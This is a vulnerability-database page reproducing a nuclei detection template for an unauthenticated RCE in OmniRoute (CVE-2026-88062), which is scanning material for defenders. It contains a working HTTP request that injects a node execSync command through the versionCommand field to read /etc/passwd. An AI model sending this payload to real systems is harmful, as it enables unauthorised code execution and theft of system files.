Lucene search
+L

OmniRoute < 3.8.49 - Unauthenticated RCE

🗓️ 15 Sep 2026 05:39:31Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

OmniRoute

Related
Refs
Code
id: CVE-2026-88062

info:
  name: OmniRoute < 3.8.49 - Unauthenticated RCE
  author: 0x_Akoko
  severity: critical
  description: |
    OmniRoute <= 3.8.49 contains a remote code execution caused by insufficient validation of interpreter arguments in the POST /api/acp/agents endpoint, letting remote attackers execute arbitrary code, exploit requires anonymous access when requireLogin is false or management session/API key when true.
  impact: |
    Remote attackers can execute arbitrary code in the server container, potentially leading to full system compromise.
  remediation: |
    Update to the latest version once a fix is available.
  reference:
    - https://github.com/diegosouzapw/OmniRoute/security/advisories/GHSA-hf57-cqmx-p4gr
    - https://github.com/diegosouzapw/OmniRoute/pull/11028
    - https://nvd.nist.gov/vuln/detail/CVE-2026-88062
  classification:
    cvss-score: 9.5
    cve-id: CVE-2026-88062
    cwe-id: CWE-94,CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: omniroute
    product: omniroute
    shodan-query: http.title:"OmniRoute"
    fofa-query: title="OmniRoute"
  tags: cve,cve2026,omniroute,rce,unauth,ai

variables:
  agentid: "{{rand_base(8, 'acfhjnprx')}}"
  agentname: "{{rand_base(8, 'acfhjnprx')}}"
  alias: "{{rand_base(8, 'acfhjnprx')}}"

http:
  - raw:
      - |
        POST /api/acp/agents HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":"{{agentid}}","name":"{{agentname}}","binary":"node","versionCommand":"node -e \"process.stdout.write(require('child_process').execSync('cat /etc/passwd').toString())\"","providerAlias":"{{alias}}","spawnArgs":[],"protocol":"stdio","version":"","installed":true,"isCustom":true}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "json")'
          - 'regex("root:.*:0:0:", body)'
        condition: and
# digest: 4b0a00483046022100abbdfbb7b97cad1c156b02edfd020b188190d4062e5e2dced35be5cc764c079f022100d91e317b9c90d2b96a2d6b53d3cff813726a5d244c7dc8aa953bb192100882a4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Sep 2026 05:39Current
CVSS 49.5
EPSS0.00403
SSVC
2